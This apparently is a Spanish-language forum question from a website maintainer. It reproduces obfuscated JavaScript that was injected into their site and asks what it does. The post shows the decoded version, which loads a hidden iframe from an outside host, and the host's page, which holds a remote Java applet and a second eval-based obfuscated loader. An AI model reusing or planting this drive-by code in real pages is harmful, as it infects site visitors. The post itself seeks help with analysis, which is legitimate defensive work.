Este código ha aparecido en un sitio web que he estado manteniendo, ¿alguna pista sobre lo que está sucediendo aquí?¿Cuál es el propósito de este hack de JavaScript?
if (window.document) aa = [] + 0;
aaa = 0 + [];
if (aa.indexOf(aaa) === 0) {
ss = '';
try {
new location(12);
} catch (qqq) {
s = String;
f = 'f' + 'r' + 'o' + 'm' + 'C' + 'har';
f += 'Code';
}
ee = 'e';
e = window.eval;
t = 'y';
}
h = Math.round(-4 * Math.tan(Math.atan(0.5)));
n = "3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a57.5a55a49a47.5a57a49.5a21.5a52.5a48a23.5a27a26a24a27a24.5a23.5a23.5a22a48.5a54.5a53.5a22.5a48.5a51a49.5a48.5a52.5a22a55a51a55a30.5a49a47.5a57a49.5a29.5a23a27a49.5a47.5a48.5a49.5a47.5a48.5a48.5a48.5a25.5a25a26a47.5a25.5a24.5a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a57.5a55a49a47.5a57a49.5a21.5a52.5a48a23.5a27a26a24a27a24.5a23.5a23.5a22a48.5a54.5a53.5a22.5a48.5a51a49.5a48.5a52.5a22a55a51a55a30.5a49a47.5a57a49.5a29.5a23a27a49.5a47.5a48.5a49.5a47.5a48.5a48.5a48.5a25.5a25a26a47.5a25.5a24.5a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");
for (i = 0; i - n.length < 0; i++) {
j = i;
ss = ss + s[f](-h * (1 + 1 * n[j]));
}
q = ss;
if (f) e(q);
edición alertar q
resultados en este código
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://update-kb18628311.com/check.php?date=08eaceaccc546a53' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://update-kb18628311.com/check.php?date=08eaceaccc546a53');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
De http://update-kb18628311.com/check.php?date=08eaceaccc546a53
<html>
<body>
<applet code='Photo.class' archive='http://update-kb18628311.com/content/jav2.jar'>
<param name="p" value="vssMlgghMA7s6af.dB=3B%ddPJFUgYPMvM-Vc/oAd/G6cr"
/>
</applet>
<div style="color:red;">
<p style="display:none;">ti#y/SNIP/#ti#ye#uw#to#tu#ur#w#qr#y#y#y#-q#qu#ie#ue#up#yy#y#-w#-q#qu</p>
</div>
<script>
ss = 's';
g = 'g';
r = 'r';
d = 'd';
c = 'c';
t = 't';
try {
new window(123).typ;
} catch (qq) {
aa = /s/g.exec("a" + "sd").index + [];
e = window.eval;
cc = document;
}
aaa = 1 + [];
i = 0;
try {
new btoa({});
} catch (qqq) {
if (aaa == aa) for (;;) {
a = cc.body[c + 'h' + 'ildNodes'][i];
if (a[t + "agName"].toLowerCase() == "div") break;
i++;
}
try {
new btoa(12);
} catch (qqq) {
r += "eplace";
}
a = a[c + 'hildNodes'][0].innerHTML;
a = a[r](/q/g, "1");
a = a[r](/w/g, "2");
a = a[r](/e/g, "3");
a = a[r](/r/g, "4");
a = a[r](/t/g, "5");
a = a[r](/y/g, "6");
a = a[r](/u/g, "7");
a = a[r](/i/g, "8");
a = a[r](/o/g, "9");
a = a[r](/p/g, "0");
}
a = a.split("#");
md = 'a';
c = [];
i = 0;
p = parseInt;
try {
new window(123).typ;
} catch (qqq) {
qq = String;
}
try {
new btoa(12);
} catch (qqq) {
fr = "ode";
}
try {
new window(123).typ;
} catch (qqq) {
qq2 = e("qq.fromCharC" + fr);
}
if (aaa == aa) {
while (13153 > i) {
vv = a[i];
r2 = cc = qq2(40 + 2 + 1 * vv);
r = c;
if (fr) c = r + r2;
i = i + 1;
}
w = e;
w(c);
}
</script>
</body>
</html>
Parece código de ataque ofuscado, aunque no veo lo que hace. – hayavuk
Probablemente deberías intentar averiguar qué hace al mirarlo en reversa y descubrir cómo se calcula cada var, uno por uno. – hayavuk
Nah, acaba de ejecutarlo y volcar 'q' a la consola = p –